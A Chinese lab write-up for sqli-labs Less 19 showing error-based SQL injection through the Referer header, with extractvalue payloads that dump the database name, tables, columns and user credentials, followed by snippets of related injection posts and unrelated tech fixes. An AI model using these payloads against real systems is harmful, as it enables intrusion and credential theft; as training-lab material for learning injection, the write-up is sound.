Less(19)POST - Header Injection - Referer field - Error based (基于头部的Referer POST报错注入)

1.单引号,报错型,referer型注入点:

  

  本题和上一题很像,回显是referer,查一下php文加可以发现,insert语句中向数据库插入了referer,所以注入点改为referer

2.爆破

  (1)Referer: ‘ and extractvalue(1,concat(0x7e,(select version()),0x7e)) and ‘

    

    发现没问题

  (2)爆库:‘ and extractvalue(1,concat(0x7e,(select database()),0x7e)) and ‘

    

  (3)爆表: ‘ and extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()))) and ‘

    

  (4)爆列名:‘ and extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name=‘users‘ and column_name not in(‘user_id‘,‘first_name‘,‘last_name‘,‘user‘,‘avatar‘,‘last_login‘,‘failed_login‘)))) and ‘

    

  (5)爆值:‘ and extractvalue(1,concat(0x7e,(select group_concat(username,0x3a,password) from users))) and ‘

    

    

    通过 not in(),我们可以找到所有的用户名和密码:

    Dumb:Dumb    Angelinal:I-kill-you   Dummy:[email protected]   secure:crappy   stupid:stupidiry   superman:genious   batman:mob!le   admin:admin   admin1:admin1   admin2:admin2   admin3:admin3   dhakkan:dumbo   admin4:admin4

原文地址:https://www.cnblogs.com/meng-yu37/p/12303729.html

时间: 2024-10-31 03:22:00

Less(19)POST - Header Injection - Referer field - Error based (基于头部的Referer POST报错注入)的相关文章

【sqli-labs】 less18 POST - Header Injection - Uagent field - Error based (基于错误的用户代理,头部POST注入)

这次username和password都进行了输入校验 但是ip和uagent没有校验 当我们用admin admin登陆成功后,就会一条插入语句 由于程序无条件的信任了浏览器的header信息,那么通过修改http包的header信息构造注入 使用burpsuite进行包拦截/修改 修改user-agent字段,加个单引号 User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0'

Less(20)POST - Cookie injections - Uagent field - Error based (基于错误的cookie头部POST注入)

1.单引号,报错型,cookie型注入. (1)登录后页面显示: (2)查看一下php文件 可以看到查询语句查询cookee,那我们就在cookies里面进行注入 (3)抓包看一下: 看到cookie:uname=admin ,就可以以cookie注入了 (4)加单引号发现: 爆出语法错误,看得出来就是单引号型; (5)接下来查一下行数 Cookie:uname=admin' order by 3 --+ //正常 Cookie:uname=admin' order by 4 --+  //不正

解决:sudo: parse error in /etc/sudoers near line 24 ...报错

ubuntu系统下由于添加用户权限的时候直接用的vim对 /etc/sudoers 文件编辑,保存退出的时候,再使用sudo su 等等命令一直报错如下: sudo: parse error in /etc/sudoers near line 24 sudo: no valid sudoers sources found, quitting sudo: unable to initialize policy plugin 原因是直接用vim修改文件时报错,参考Google说,应该用visudo命

Android Studio ERROR: x86 emulation currently requires hardware acceleration!报错解决傻瓜教程~

很早之前就碰到过Android Studio模拟器无法启动的问题,今天终于尝试去解决了下,下面将我解决的方法记录下. 模拟器报错信息为: emulator: ERROR: x86 emulation currently requires hardware acceleration! Please ensure Intel HAXM is properly installed and usable. CPU acceleration status: HAX kernel module is not

magento upload http error 上传新产品的时候报错

最开始碰到这个错误的时候不知所措,记下来希望碰到这个问题的童鞋可以轻松解决 最开始以为是权限问题, 到处找, php.ini   memory_limit http.conf  各种限制配置,结果都没有效果 后来才发现一个地方说没有安装php图像看 GD, 我用yum安装GD 然后又报了一个 Destination folder is not writable or does not exists. 这个才是权限问题 “Destination folder is not writable or

Error parsing XML: not well-formed (invalid token) 报错+R文件消失解决办法

xml报错: 这个xml文件上右键source ->format 注意:res下的文件名不能大写 R文件消失: 在解决了其他问题的情况下(或者其他问题还没解决先注释掉) 手动删除gen project clean后重新build 版权声明:本文为博主原创文章,未经博主允许不得转载.

Error parsing XML: not well-formed (invalid token) 报错+R文件消失解决的方法

xml报错: 这个xml文件上右键source ->format 注意:res下的文件名称不能大写 R文件消失: 在攻克了其它问题的情况下(或者其它问题还没解决先凝视掉) 手动删除gen project clean后又一次build

Latex Error cannot determine the size of graphic 报错的解决办法

插入jpg文件老是会报错... 追究了半天,原来是编译的命令又问题,不应该使用 latex ./hello.tex 而应该使用 pdflatex ./hello.tex 下面是我用的测试代码.其中包含了中文字体的测试. \documentclass{article} \usepackage{CJKutf8} \usepackage{graphicx} \begin{document} \begin{CJK}{UTF8}{gkai} 这是一个楷体中文测试,处理简体字. \end{CJK} \beg

mybatis之insert语句报错Cause: java.sql.SQLException: sql injection violation, syntax error: ERROR. token : WHERE,

报错日志:org.springframework.jdbc.UncategorizedSQLException: Error updating database. Cause: java.sql.SQLException: sql injection violation, syntax error: ERROR. token : WHERE, pos : 315 : UPDATE jxdx_leave 报错原因:多了一个逗号: 关键看token后面,这里通过token可以直接定位报错地点: 原文